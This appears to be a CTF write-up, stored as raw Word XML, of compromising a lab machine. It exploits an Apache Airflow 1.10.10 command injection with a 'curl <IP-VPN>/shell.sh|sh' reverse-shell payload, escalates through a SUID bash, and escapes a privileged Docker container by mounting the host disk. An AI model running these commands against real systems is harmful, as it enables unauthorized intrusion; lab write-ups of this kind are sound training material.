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AIR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5s1u882xk3bg"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lflpv2ht9egc"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4673600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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sij8cziqif49" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>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8080 - HTTP</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port 8080, we have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Airflow</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Apache Airflow is an open-source workflow management platform.</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6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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Docs &gt; Documentation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, I can see the Airflow version → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.10.10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. So I search Google for an exploit, and indeed, this version of Airflow is vulnerable to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1775"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57" name="image12.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image12.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect b="53155" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2141775"/>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ExploitDB</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52800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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exploit abuses the example DAG, which is vulnerable to command injection, together with the experimental REST API that is public by default — even if the web interface has authentication enabled.</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download the exploit to our machine and test it =)</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14700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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to our machine, the next steps will be:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">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Create a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">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Python server to serve our payload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shell.sh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6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27400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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let’s execute the exploit 😃</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2667000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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exploit.py http://172.31.23.8:8080 "curl &lt;IP-VPN&gt;/shell.sh|sh"</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it, we receive the connection 😃</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13100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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lb32827cc71s" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>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upgrading the shell, I run the following command to confirm that we are inside a container:</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/etc/hostname</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5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solving CTF challenges, we always check SUID permissions on any file or command for privilege escalation. It is very important to understand what SUID is, how to configure it, and how it helps with privilege escalation.</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 -perm /4000 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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6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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash binary with SUID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and we can escalate to the root user from it =)</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Simply execute the following command:</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-p</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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter runs the shell with the file owner’s permissions — which in this case is root =)</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5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we find our first flag. Everything indicates that we must escape the container to retrieve the root flag =)</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7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val6pj4kb453" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker Escape</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are inside a container, we need to attempt to escape it. For that, I will use the following resource:</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Docker Breakout / Privilege Escalation</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">D-Bus Enumeration &amp; Command Injection Privilege Escalation</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId21">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https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation</w:t>
        </w:r>
      </w:hyperlink>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1bvl7gry93rv" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escape mounting the disk in the container:</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Well-configured Docker containers do not allow commands such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fdisk -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, in improperly configured Docker setups where the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--privileged</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag is specified, it is possible to gain privileges to view the host disk.</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to take control of the host machine, it becomes trivial.</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5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Oops, we were not able to mount the partition even being root — why?</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you notice, we have an effective user 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euid</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and because of that, we are limited in executing certain commands.</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bypass this, we can set only the → UID.</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do this using Python:</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os; os.setuid(0);os.system('/bin/bash')"</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6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mount the partition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098800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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voilà! Now we can access the host filesystem because it is mounted under </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt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can retrieve our final flag 😀</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7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6">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8"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7">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8">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Air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0.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation" TargetMode="External"/><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6.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.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2.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><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8.png"/><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vOeKAYAKjTEBPDiYvyF5q8jpQ==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLjVzMXU4ODJ4azNiZzIOaC5sZmxwdjJodDllZ2MyDmguc2lqOGN6aXFpZjQ5Mg5oLmxiMzI4MjdjYzcxczIOaC52YWw2cGo0a2I0NTMyDmguMWJ2bDdncnk5M3J2Mg5oLjE3NWY1Y3M5NHowbzgAciExVUFEa0RxdC1pM1NTX3E4eHItdC1Iam5XaVhaTEhKZ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